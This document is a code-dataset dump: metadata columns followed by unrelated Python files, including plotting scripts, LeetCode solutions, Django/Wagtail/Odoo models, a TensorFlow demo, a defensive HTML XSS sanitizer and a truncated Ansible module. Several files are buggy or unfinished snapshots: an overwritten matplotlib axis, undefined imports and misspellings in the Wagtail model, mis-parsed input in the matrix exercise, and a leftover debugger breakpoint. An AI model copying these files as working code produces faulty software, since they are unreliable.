blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
288
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 684
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 25
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 128
12.7k
| extension
stringclasses 142
values | content
stringlengths 128
8.19k
| authors
listlengths 1
1
| author_id
stringlengths 1
132
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5160648ff6181e00a8245bb666375417f509ab68
|
02e23da0431623db86c8138bda350a1d526d4185
|
/Archivos Python Documentos/Graficas/.history/3d_20200219112629.py
|
1f977510511dff31a480c6ee7a600b119cdd23c8
|
[] |
no_license
|
Jaamunozr/Archivos-python
|
d9996d3d10ff8429cd1b4c2b396016a3a5482889
|
1f0af9ba08f12ac27e111fcceed49bbcf3b39657
|
refs/heads/master
| 2022-08-05T14:49:45.178561
| 2022-07-13T13:44:39
| 2022-07-13T13:44:39
| 244,073,267
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 417
|
py
|
import pylab as pl
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
fig = pl.figure()
ax = Axes3D(fig)
X = np.arange(-10, 10, 0.25)
Y = np.arange(-10, 10, 0.25)
X, Y = np.meshgrid(X, Y)
ax = int(5) #, ay = 0.5
print(int(ax))
Z = np.sqrt(X ** 2 + Y ** 3)
ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=pl.cm.hot)
ax.contourf(X, Y, Z, zdir='z', offset=-2, cmap=pl.cm.hot)
ax.set_zlim(-2, 2)
pl.show()
|
[
"jaamunozr@gmail.com"
] |
jaamunozr@gmail.com
|
4a78a093202a039af99d5d6f6fa91fbb5996a7b5
|
e0980f704a573894350e285f66f4cf390837238e
|
/.history/news/models_20201124144521.py
|
8af4cd733221c3bf6f1b3de3521f5b42a13a09fd
|
[] |
no_license
|
rucpata/WagtailWebsite
|
28008474ec779d12ef43bceb61827168274a8b61
|
5aa44f51592f49c9a708fc5515ad877c6a29dfd9
|
refs/heads/main
| 2023-02-09T15:30:02.133415
| 2021-01-05T14:55:45
| 2021-01-05T14:55:45
| 303,961,094
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,234
|
py
|
from django.db import models
from wagtail.contrib.forms.models import AbstractEmailForm
# Create your models here.
class NewsPage(AbstractEmailForm):
tempalte ='news/news_page.html'
leanding_page_template = 'news/news_page_leading.html'
subpage_types = []
max_coun = 1
intro = RichTextField(blank=True, features=['bold', 'italic', 'ol', 'ul'])
thank_you_text = RichTextField(
blank=True,
features=['bold', 'italic', 'ol', 'ul'])
map_image = models.ForeignKey(
'wagtailimages.Image',
null=True,
blank=False,
on_delete=models.SET_NULL,
help_text='Obrazek będzie przycięty do rozmairu 588px na 355 px',
related_name='+',
)
map_url = models.URLField(
blank=True,
help_text='Opcjonalne. Jeśli podasz tutaj łączę, obraz stanie si'
)
content_panels = AbstractEmailForm.content_panel + [
FieldPanel('intro'),
ImageChooserPanel('map_iamge'),
FieldPanel('map_url'),
InlinePanel('form_fields', label="Form Fields"),
FieldPanel('thank_you_text'),
FieldPanel('from_address'),
FieldPanel('to_address'),
FieldPanel('subject'),
]
|
[
"rucinska.patrycja@gmail.com"
] |
rucinska.patrycja@gmail.com
|
6a757cada6a40ec963004ced739f41d9c6365765
|
350db570521d3fc43f07df645addb9d6e648c17e
|
/0349_Intersection_of_Two_Arrays/solution.py
|
09b0c446678c615e5439884d5e2bd613446fb3e3
|
[] |
no_license
|
benjaminhuanghuang/ben-leetcode
|
2efcc9185459a1dd881c6e2ded96c42c5715560a
|
a2cd0dc5e098080df87c4fb57d16877d21ca47a3
|
refs/heads/master
| 2022-12-10T02:30:06.744566
| 2022-11-27T04:06:52
| 2022-11-27T04:06:52
| 236,252,145
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 681
|
py
|
'''
349. Intersection of Two Arrays
Given two arrays, write a function to compute their intersection.
Example:
Given nums1 = [1, 2, 2, 1], nums2 = [2, 2], return [2].
Note:
Each element in the result must be unique.
The result can be in any order.
'''
def arrays_interseciton(nums1, nums2):
return set(nums1).intersection(nums2)
# Input:
# [1,2,2,1]
# [2]
# Output:
# [2,2]
# Expected:
# [2]
def arrays_interseciton_2(nums1, nums2):
return [x for x in set(nums1) if x in set(nums2)]
def arrays_interseciton_3(nums1, nums2):
return list(set(nums1) & set(nums2))
b1 = [1, 2, 3, 4, 5, 9, 11, 15]
b2 = [4, 5, 6, 7, 8]
print arrays_interseciton(b1, b2)
|
[
"bhuang@rms.com"
] |
bhuang@rms.com
|
724d0bb4e0744c1d6d69e5e19135a4287262044b
|
eb0711915d6bba2f765f052736e33ac9a9a397a6
|
/HE0435/simulation/rebin/rebin_arc.py~
|
337e999780ea9cca34a003793c200dfa2a4d4cf5
|
[] |
no_license
|
dartoon/GL_HostGalaxy
|
cd2166f273ae7e0397a7d2d39f760ab59e86f014
|
7469f1c1e640d176a75cc6e9497920e494ad656a
|
refs/heads/master
| 2016-08-11T13:27:17.545360
| 2016-04-07T19:04:57
| 2016-04-07T19:04:57
| 46,524,027
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 856
|
#from high resoluted images (sub=6) to lower one (bin together)
from numpy import *
from block import *
import pyfits
file1 = open('../pylens/HE0435.txt','r')
para = loadtxt(file1)
file1.close()
#print len(para)
ln=len(para)
for l in range(ln):
filename='../fits/HE_arc-{0}.fits'.format(l+1) # take one image
d = pyfits.open(filename)[0].data.copy()
d = concatenate([d,zeros([10,len(d.T)])])
d = concatenate([d,zeros([len(d),10])],axis=1) #expand the array
#print sum(d[65:69,67:71])
#[0:136] x ,y -> y, x
#### y x
#0:174
a=[0,3,0,3,2,5,2,5,4,1,4,1]
b=[0,0,3,3,4,4,1,1,2,2,5,5] #from the info. given by kai
for i in range(len(a)):
dd=d[a[i]:360+a[i],b[i]:360+b[i]] #the size before bin
aaa=block(dd,(60,60))
pyfits.PrimaryHDU(aaa).writeto('../fits/binall/arc-{0}-{1}.fits'.format(l+1,i+1),clobber=True)
|
[
"dingxuheng@mail.bnu.edu.cn"
] |
dingxuheng@mail.bnu.edu.cn
|
|
8559ef8a1708043e87dc324c69fdc5c2fd4a9cc5
|
5306217707f99ff1d082bb974db0ccebf948763f
|
/ntds/management/commands/load_ntd_reporters.py
|
6a982e8e91b60fd7022f626c0220309161086c87
|
[] |
no_license
|
sparkplug/rapidsms-ntds
|
05b64e67d5bcf751029653eb2f2a64e331e9a9c9
|
8b42c749db4c34e43eb39f3c52d540c84a8b810e
|
refs/heads/master
| 2021-01-16T17:45:09.821171
| 2016-02-15T20:50:26
| 2016-02-15T20:50:26
| 25,920,319
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,712
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from django.core.management import BaseCommand
from rapidsms_xforms.models import *
from ntds.utils import validate_number
from rapidsms.contrib.locations.models import Location
from django.utils.safestring import mark_safe
from ntds.models import Reporter
import operator
from django.db.models import Q
import re
from rapidsms_httprouter.models import Message, Connection
from django.contrib.auth.models import User,Group
from openpyxl.reader.excel import load_workbook
from openpyxl.workbook import Workbook
from uganda_common.utils import assign_backend
from healthmodels.models.HealthProvider import HealthProvider
from rapidsms.models import Connection, Contact,Backend
from optparse import make_option
import django
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('-f', '--file', dest='file'),)
def handle(self, **options):
import pdb;pdb.set_trace()
file = options['file']
wb = load_workbook(filename=file)
ws=wb.get_sheet_by_name("Community and Schools")
for row in ws.rows[1:]:
try:
role, _ = Group.objects.get_or_create(name='Ntds')
mobile_is_valid,cleaned_mobile=validate_number("0"+str(row[10].value))
try:
msisdn, backend = assign_backend(cleaned_mobile)
except ValidationError:
msisdn, backend = assign_backend(str(row[10].value).split("/")[0])
backend,_=Backend.objects.get_or_create(name="yo")
connection, conn_created = Connection.objects.get_or_create(identity=cleaned_mobile, backend=backend)
try:
district=Location.objects.filter(type="district",name__icontains= row[2].value.strip())[0]
except IndexError:
district=None
try:
subcounty=Location.objects.filter(type="sub_county",name__icontains= row[5].value.strip())[0]
except IndexError:
subcounty=None
try:
pr=row[8].value.strip()
if pr=="Aria":
pr="Ariya"
parish=district.get_descendants().filter(type="parish",name__icontains=row[8].value.strip())[0]
except IndexError:
parish=None
print "index error %s"%row[8].value
if conn_created:
provider = HealthProvider.objects.create(name=row[9].value.strip(), location=parish)
provider.groups.add(role)
connection.contact = provider
connection.save()
rep = Reporter(healthprovider_ptr=provider)
rep.__dict__.update(provider.__dict__)
rep.district=district
rep.subcounty=subcounty
rep.parish=parish
rep.community=row[11].value.strip()
rep.id_number=str(row[0].value)
rep.county=row[3].value.strip()
rep.subcounty_supervisor=row[6].value.strip()
_,s_mobile=validate_number(str(row[7].value))
rep.subcounty_supervisor_mobile=s_mobile
rep.region=row[1].value.strip()
rep.health_subcounty=row[4].value.strip()
rep.subcounty_name = row[5].value.strip()
rep.parish_name = row[8].value.strip()
rep.save()
except ValidationError:
pass
|
[
"mossplix@gmail.com"
] |
mossplix@gmail.com
|
f7ed33b9024bcb5172bdd606904702df2764077f
|
f043fee89c0e2030386adcebb74d08164b7b974f
|
/reagent/net_builder/continuous_actor/fully_connected.py
|
d4e4b0544a3a1aedfbc18dfbfa123066351d9bac
|
[
"BSD-3-Clause"
] |
permissive
|
IronOnet/ReAgent
|
c2d22e7dc63eaf61e0a50e9343110c6df79a9b40
|
67434f458cde1f2c946237e866a73392279a7ede
|
refs/heads/master
| 2023-04-06T17:31:59.751700
| 2021-04-12T21:56:19
| 2021-04-12T21:57:05
| 357,700,053
| 2
| 0
|
BSD-3-Clause
| 2021-04-13T22:04:09
| 2021-04-13T22:04:09
| null |
UTF-8
|
Python
| false
| false
| 1,998
|
py
|
#!/usr/bin/env python3
from typing import List, Optional
from reagent.core.dataclasses import dataclass, field
from reagent.core.parameters import NormalizationData, param_hash
from reagent.models.actor import FullyConnectedActor
from reagent.models.base import ModelBase
from reagent.net_builder.continuous_actor_net_builder import ContinuousActorNetBuilder
from reagent.preprocessing.identify_types import CONTINUOUS_ACTION
from reagent.preprocessing.normalization import get_num_output_features
@dataclass
class FullyConnected(ContinuousActorNetBuilder):
__hash__ = param_hash
sizes: List[int] = field(default_factory=lambda: [128, 64])
activations: List[str] = field(default_factory=lambda: ["relu", "relu"])
use_batch_norm: bool = False
use_layer_norm: bool = False
action_activation: str = "tanh"
exploration_variance: Optional[float] = None
def __post_init_post_parse__(self):
super().__init__()
assert len(self.sizes) == len(self.activations), (
f"Must have the same numbers of sizes and activations; got: "
f"{self.sizes}, {self.activations}"
)
@property
def default_action_preprocessing(self) -> str:
return CONTINUOUS_ACTION
def build_actor(
self,
state_normalization_data: NormalizationData,
action_normalization_data: NormalizationData,
) -> ModelBase:
state_dim = get_num_output_features(
state_normalization_data.dense_normalization_parameters
)
action_dim = get_num_output_features(
action_normalization_data.dense_normalization_parameters
)
return FullyConnectedActor(
state_dim=state_dim,
action_dim=action_dim,
sizes=self.sizes,
activations=self.activations,
use_batch_norm=self.use_batch_norm,
action_activation=self.action_activation,
exploration_variance=self.exploration_variance,
)
|
[
"facebook-github-bot@users.noreply.github.com"
] |
facebook-github-bot@users.noreply.github.com
|
4ca9ecc74b019cd4659ed7ea6d8725e8ecdc45b2
|
780fa3fed7e5890f26f9c952f10cefbacfa6e09a
|
/recursive_convolution.py
|
69f1fc591f8ffd4d30a7c182f4f9dc8aae9f26f8
|
[] |
no_license
|
jsrimr/code_during_KTaiacadmey
|
d508303417fe0916f98f7cd65c6521adb0a933fa
|
ab98b1613d9cb8ca77cd2462e0a42664b71bd758
|
refs/heads/master
| 2021-12-03T08:09:01.199462
| 2018-06-25T05:49:07
| 2018-06-25T05:49:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,346
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 22 17:18:19 2018
@author: ktai12
"""
import numpy as np
import tensorflow as tf
import matplotlib.pyplot as plt
sess=tf.InteractiveSession()
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("/tmp/data/", one_hot=True)
#convolution 압축을 확인하자!
#압축률이 다른 5장의 사진
img=mnist.train.images[0].reshape(28,28)
#original-28*28
plt.imshow(img)
plt.title('original')
W=tf.Variable(tf.random_normal([3,3,1,1],stddev=0.01))
img=img.reshape(-1,28,28,1)
conv2d=tf.nn.conv2d(img,W,strides=[1,1,1,1],padding="VALID")
sess.run(tf.global_variables_initializer())
conv2d_img1=conv2d.eval()
conv2d_img1.shape
#convolution once - 26*26
img1=conv2d_img1.reshape(26,26)
plt.imshow(img1)
plt.title('once')
#convolution twice
conv2d=tf.nn.conv2d(conv2d_img1,W,strides=[1,1,1,1],padding="VALID")
conv2d_img2=conv2d.eval()
conv2d_img2.shape
img2=conv2d_img2.reshape(24,24)
plt.imshow(img2)
plt.title('once')
tmp=img
for i in range(10):
a=tmp.shape[0]
tmp=tmp.reshape(-1,a,a,1)
conv2d=tf.nn.conv2d(tmp,W,strides=[1,1,1,1],padding="VALID")
conv2d_img=conv2d.eval()
k=conv2d_img.shape[1]
tmp=conv2d_img.reshape(k,k)
plt.imshow(tmp)
plt.title("{0}*{0} size".format(k))
plt.show()
|
[
"jsrimr@naver.com"
] |
jsrimr@naver.com
|
aa6ea506e424f5b0a50f4537652395b31a901596
|
75e1d9446cb1fca5c6a79ad0ba7f38268df1161f
|
/Python Programs/rotate-matrix-pattern.py
|
baeb1e16ee8363e61f12b29a05e4442f2d438d48
|
[
"CC0-1.0"
] |
permissive
|
muhammad-masood-ur-rehman/Skillrack
|
6e9b6d93680dfef6f40783f02ded8a0d4283c98a
|
71a25417c89d0efab40ee6229ccd758b26ae4312
|
refs/heads/main
| 2023-02-03T16:45:54.462561
| 2020-12-23T08:36:28
| 2020-12-23T08:36:28
| 324,221,340
| 4
| 1
|
CC0-1.0
| 2020-12-24T19:12:54
| 2020-12-24T19:12:54
| null |
UTF-8
|
Python
| false
| false
| 1,377
|
py
|
Rotate Matrix Pattern
The program must accept an integer matrix of size N*N as the input. The program must rotate the matrix by 45 degrees in the clockwise direction. Then the program must print the rotated matrix and print asterisks instead of empty places as the output.
Boundary Condition(s):
3 <= N <= 100
Input Format:
The first line contains N.
The next N lines, each contains N integers separated by a space.
Output Format:
The first (2*N)-1 lines containing the rotated matrix.
Example Input/Output 1:
Input:
3
1 2 3
4 5 6
7 8 9
Output:
**1
*4 2
7 5 3
*8 6
**9
Explanation:
After rotating the matrix by 45 degrees in the clockwise direction, the matrix becomes
1
4 2
7 5 3
8 6
9
So the rotated matrix is printed and the asterisks are printed instead of empty places.
Example Input/Output 2:
Input:
4
13 21 36 49
55 65 57 80
17 32 63 44
56 60 78 98
Output:
***13
**55 21
*17 65 36
56 32 57 49
*60 63 80
**78 44
***98
n=int(input())
arr=[]
for i in range(n):
a=[]
for j in range(n):
a.append(int(input()))
arr.append(a)
s1,s2=0,0
stars=n-1
for i in range(1, (2*n)):
i1=s1
i2=s2
for j in range(1,n+1):
if(j<=stars):
print("*",end=' ')
else:
print(arr[i1][i2],end=" ")
i1-=1
i2+=1
if(i>n-1):
s2+=1
stars+=1
else:
stars-=1
s1+=1
print("")
|
[
"36339675+hemanthtejadasari@users.noreply.github.com"
] |
36339675+hemanthtejadasari@users.noreply.github.com
|
079896499559440bc3938ad7b69fe1408bc3ac4c
|
7f167121b52312d65663d781819356eac65843ed
|
/lib/xss.py
|
d7d8def40702d5eb17aac4d709ddc99b82bb50ed
|
[] |
no_license
|
mongoltolbo/mifan.tv
|
b3526aaeb5394b3ac1e7af85b8ea3a74e90ce73e
|
9ba59b049866dff7c4d9eceabed91d8a1878ef4b
|
refs/heads/master
| 2020-05-04T19:20:22.340674
| 2013-08-27T15:53:34
| 2013-08-27T15:53:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,954
|
py
|
#!/usr/bin/env python
# coding=utf-8
#
# Copyright 2013 tuila.me
# Source: http://code.activestate.com/recipes/496942/ (r1)
import re
from htmllib import HTMLParser
from cgi import escape
from urlparse import urlparse
from formatter import AbstractFormatter
from htmlentitydefs import entitydefs
from xml.sax.saxutils import quoteattr
def xssescape(text):
"""Gets rid of < and > and & and, for good measure, :"""
# return escape(text, quote=True).replace(':',':')
# return re.sub(r'(?<!http)(?<!https):', ':', escape(text, quote=True))
return escape(text, quote=True)
class XssCleaner(HTMLParser):
def __init__(self, fmt = AbstractFormatter):
HTMLParser.__init__(self, fmt)
self.result = ""
self.open_tags = []
# A list of the only tags allowed. Be careful adding to this. Adding
# "script," for example, would not be smart. 'img' is out by default
# because of the danger of IMG embedded commands, and/or web bugs.
self.permitted_tags = ['a', 'b', 'blockquote', 'br', 'i',
'li', 'ol', 'ul', 'p', 'cite']
# A list of tags that require no closing tag.
self.requires_no_close = ['img', 'br']
# A dictionary showing the only attributes allowed for particular tags.
# If a tag is not listed here, it is allowed no attributes. Adding
# "on" tags, like "onhover," would not be smart. Also be very careful
# of "background" and "style."
self.allowed_attributes = \
{'a':['href','title'],
'img':['src','alt'],
'blockquote':['type']}
# The only schemes allowed in URLs (for href and src attributes).
# Adding "javascript" or "vbscript" to this list would not be smart.
self.allowed_schemes = ['http','https','ftp']
def handle_data(self, data):
if data:
self.result += xssescape(data)
def handle_charref(self, ref):
if len(ref) < 7 and ref.isdigit():
self.result += '&#%s;' % ref
else:
self.result += xssescape('&#%s' % ref)
def handle_entityref(self, ref):
if ref in entitydefs:
self.result += '&%s;' % ref
else:
self.result += xssescape('&%s' % ref)
def handle_comment(self, comment):
if comment:
self.result += xssescape("<!--%s-->" % comment)
def handle_starttag(self, tag, method, attrs):
if tag not in self.permitted_tags:
self.result += xssescape("<%s>" % tag)
else:
bt = "<" + tag
if tag in self.allowed_attributes:
attrs = dict(attrs)
self.allowed_attributes_here = \
[x for x in self.allowed_attributes[tag] if x in attrs \
and len(attrs[x]) > 0]
for attribute in self.allowed_attributes_here:
if attribute in ['href', 'src', 'background']:
if self.url_is_acceptable(attrs[attribute]):
bt += ' %s="%s"' % (attribute, attrs[attribute])
else:
bt += ' %s=%s' % \
(xssescape(attribute), quoteattr(attrs[attribute]))
if bt == "<a" or bt == "<img":
return
if tag in self.requires_no_close:
bt += "/"
bt += ">"
self.result += bt
self.open_tags.insert(0, tag)
def handle_endtag(self, tag, attrs):
bracketed = "</%s>" % tag
if tag not in self.permitted_tags:
self.result += xssescape(bracketed)
elif tag in self.open_tags:
self.result += bracketed
self.open_tags.remove(tag)
def unknown_starttag(self, tag, attributes):
self.handle_starttag(tag, None, attributes)
def unknown_endtag(self, tag):
self.handle_endtag(tag, None)
def url_is_acceptable(self,url):
### Requires all URLs to be "absolute."
parsed = urlparse(url)
return parsed[0] in self.allowed_schemes and '.' in parsed[1]
def strip(self, rawstring):
"""Returns the argument stripped of potentially harmful HTML or Javascript code"""
self.result = ""
self.feed(rawstring)
for endtag in self.open_tags:
if endtag not in self.requires_no_close:
self.result += "</%s>" % endtag
return self.result
def xtags(self):
"""Returns a printable string informing the user which tags are allowed"""
self.permitted_tags.sort()
tg = ""
for x in self.permitted_tags:
tg += "<" + x
if x in self.allowed_attributes:
for y in self.allowed_attributes[x]:
tg += ' %s=""' % y
tg += "> "
return xssescape(tg.strip())
|
[
"gaolinjie@gmail.com"
] |
gaolinjie@gmail.com
|
deb0e9f6012ff44565f83f4240236d6e9dba8965
|
1ee3dc4fa096d12e409af3a298ba01f5558c62b5
|
/ixnetwork_restpy/testplatform/sessions/ixnetwork/topology/nettopologytree.py
|
b6b429aac376022dac44a1359e79e6768a182f2c
|
[
"MIT"
] |
permissive
|
parthpower/ixnetwork_restpy
|
321e64a87be0a4d990276d26f43aca9cf4d43cc9
|
73fa29796a5178c707ee4e21d90ff4dad31cc1ed
|
refs/heads/master
| 2020-07-04T13:34:42.162458
| 2019-08-13T20:33:17
| 2019-08-13T20:33:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,828
|
py
|
# MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class NetTopologyTree(Base):
"""The NetTopologyTree class encapsulates a user managed netTopologyTree node in the ixnetwork hierarchy.
An instance of the class can be obtained by accessing the NetTopologyTree property from a parent instance.
The internal properties list will be empty when the property is accessed and is populated from the server using the find method.
The internal properties list can be managed by the user by using the add and remove methods.
"""
_SDM_NAME = 'netTopologyTree'
def __init__(self, parent):
super(NetTopologyTree, self).__init__(parent)
@property
def IncludeEntryPoint(self):
"""if true, entry node belongs to ring topology, otherwise it is outside of ring
Returns:
bool
"""
return self._get_attribute('includeEntryPoint')
@IncludeEntryPoint.setter
def IncludeEntryPoint(self, value):
self._set_attribute('includeEntryPoint', value)
@property
def LinkMultiplier(self):
"""number of links between two nodes
Returns:
number
"""
return self._get_attribute('linkMultiplier')
@LinkMultiplier.setter
def LinkMultiplier(self, value):
self._set_attribute('linkMultiplier', value)
@property
def MaxChildPerNode(self):
"""Maximum children per node
Returns:
number
"""
return self._get_attribute('maxChildPerNode')
@MaxChildPerNode.setter
def MaxChildPerNode(self, value):
self._set_attribute('maxChildPerNode', value)
@property
def Nodes(self):
"""number of nodes
Returns:
number
"""
return self._get_attribute('nodes')
@Nodes.setter
def Nodes(self, value):
self._set_attribute('nodes', value)
@property
def TreeDepth(self):
"""Depth of the Tree, defined as length of path from root node to deepest node in the tree
Returns:
number
"""
return self._get_attribute('treeDepth')
@TreeDepth.setter
def TreeDepth(self, value):
self._set_attribute('treeDepth', value)
@property
def UseTreeDepth(self):
"""Use Tree Depth
Returns:
bool
"""
return self._get_attribute('useTreeDepth')
@UseTreeDepth.setter
def UseTreeDepth(self, value):
self._set_attribute('useTreeDepth', value)
def update(self, IncludeEntryPoint=None, LinkMultiplier=None, MaxChildPerNode=None, Nodes=None, TreeDepth=None, UseTreeDepth=None):
"""Updates a child instance of netTopologyTree on the server.
Args:
IncludeEntryPoint (bool): if true, entry node belongs to ring topology, otherwise it is outside of ring
LinkMultiplier (number): number of links between two nodes
MaxChildPerNode (number): Maximum children per node
Nodes (number): number of nodes
TreeDepth (number): Depth of the Tree, defined as length of path from root node to deepest node in the tree
UseTreeDepth (bool): Use Tree Depth
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
self._update(locals())
def add(self, IncludeEntryPoint=None, LinkMultiplier=None, MaxChildPerNode=None, Nodes=None, TreeDepth=None, UseTreeDepth=None):
"""Adds a new netTopologyTree node on the server and retrieves it in this instance.
Args:
IncludeEntryPoint (bool): if true, entry node belongs to ring topology, otherwise it is outside of ring
LinkMultiplier (number): number of links between two nodes
MaxChildPerNode (number): Maximum children per node
Nodes (number): number of nodes
TreeDepth (number): Depth of the Tree, defined as length of path from root node to deepest node in the tree
UseTreeDepth (bool): Use Tree Depth
Returns:
self: This instance with all currently retrieved netTopologyTree data using find and the newly added netTopologyTree data available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._create(locals())
def remove(self):
"""Deletes all the netTopologyTree data in this instance from server.
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
self._delete()
def find(self, IncludeEntryPoint=None, LinkMultiplier=None, MaxChildPerNode=None, Nodes=None, TreeDepth=None, UseTreeDepth=None):
"""Finds and retrieves netTopologyTree data from the server.
All named parameters support regex and can be used to selectively retrieve netTopologyTree data from the server.
By default the find method takes no parameters and will retrieve all netTopologyTree data from the server.
Args:
IncludeEntryPoint (bool): if true, entry node belongs to ring topology, otherwise it is outside of ring
LinkMultiplier (number): number of links between two nodes
MaxChildPerNode (number): Maximum children per node
Nodes (number): number of nodes
TreeDepth (number): Depth of the Tree, defined as length of path from root node to deepest node in the tree
UseTreeDepth (bool): Use Tree Depth
Returns:
self: This instance with matching netTopologyTree data retrieved from the server available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._select(locals())
def read(self, href):
"""Retrieves a single instance of netTopologyTree data from the server.
Args:
href (str): An href to the instance to be retrieved
Returns:
self: This instance with the netTopologyTree data from the server available through an iterator or index
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
|
[
"srvc_cm_packages@keysight.com"
] |
srvc_cm_packages@keysight.com
|
f9e738f5b5b8110966032a68c9aeae66c200a6bf
|
7c9919126b96122c1a8c6353769e209d850e4564
|
/bnk_hr_leave/models/hr_leave_allocation.py
|
bee706f6393dea1a328430f51d060ead0e48e84c
|
[] |
no_license
|
Duongnv-dev/hr
|
8ee34c904d481a4d0f4182c3c6bfd6c28ef25ffe
|
962e0edab5b824304f4a2b2dff23458135f94c3c
|
refs/heads/master
| 2023-06-19T06:54:00.337453
| 2021-07-13T01:53:34
| 2021-07-13T01:53:34
| 385,439,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 210
|
py
|
from odoo import fields, models, api
class HrLeaveAllocation(models.Model):
_inherit = 'hr.leave.allocation'
_description = 'Inherit leave allocation'
contract_id = fields.Many2one('hr.contract')
|
[
"duong.nguyen@bnksolution.com"
] |
duong.nguyen@bnksolution.com
|
9184d820d21d39a76067d3a1353b4cc581849604
|
c52e7808ab764d822267b36a185223a172a56b5a
|
/tasks/1_area_of_triangle.py
|
815e4c3722c0eea544ca8f78c924b6611d678e2e
|
[] |
no_license
|
lohitbadiger/Python-teaching-all
|
c41bfa2c98bab1493aba5269ab81efa6be02c73f
|
b7ed285b6b2df9c23fa5bf0c91381729b9ac0c6f
|
refs/heads/master
| 2020-06-02T21:13:05.276475
| 2019-06-17T06:55:06
| 2019-06-17T06:55:06
| 191,311,539
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 314
|
py
|
# base=int(input("Enter the value for base: "))
# hight=int(input('Enter the Height :'))
# area=0.5*base*hight
# print('area of the triangle is ', area)
# one more way
x,y=input('Enter the value for x, y').split()
print('value of x is ', x)
print('value of y is ', y)
reslt= 0.5*int(x)*int(y)
print(reslt)
|
[
"lohit2013n@gmail.com"
] |
lohit2013n@gmail.com
|
3e243c5c508242ec4a50d667569a9822d6418118
|
e5dc27e634aba70bcd1b3acea74fed84ddccf837
|
/plugins/modules/network_device_update_role.py
|
be3fbcb35812197122cd5cd3a645eff6418c11d8
|
[] |
no_license
|
jejrichardson/dnacenter-ansible
|
264d1b52227d4bf78ad175494763cff9e7881f34
|
f10078ef8323bda4b542e71bcecf4f80a7fe0609
|
refs/heads/master
| 2023-01-28T09:54:57.449459
| 2020-12-09T23:15:49
| 2020-12-09T23:15:49
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,543
|
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2020, Rafael Campos <rcampos@altus.cr>
# GNU General Public License v3.0+ (see LICENSE or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {
"metadata_version": "0.0.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = r"""
---
module: network_device_update_role
short_description: Manage NetworkDeviceUpdateRole objects of Devices
description:
- Updates the role of the device as access, core, distribution, border router.
version_added: '1.0'
author: Rafael Campos (@racampos)
options:
id:
description:
- NetworkDeviceBriefNIO's id.
type: str
required: True
role:
description:
- NetworkDeviceBriefNIO's role.
type: str
required: True
roleSource:
description:
- NetworkDeviceBriefNIO's roleSource.
type: str
required: True
summary:
description:
- If true gets the summary.
type: bool
required: True
requirements:
- dnacentersdk
seealso:
# Reference by module name
- module: cisco.dnac.plugins.module_utils.definitions.network_device_update_role
# Reference by Internet resource
- name: NetworkDeviceUpdateRole reference
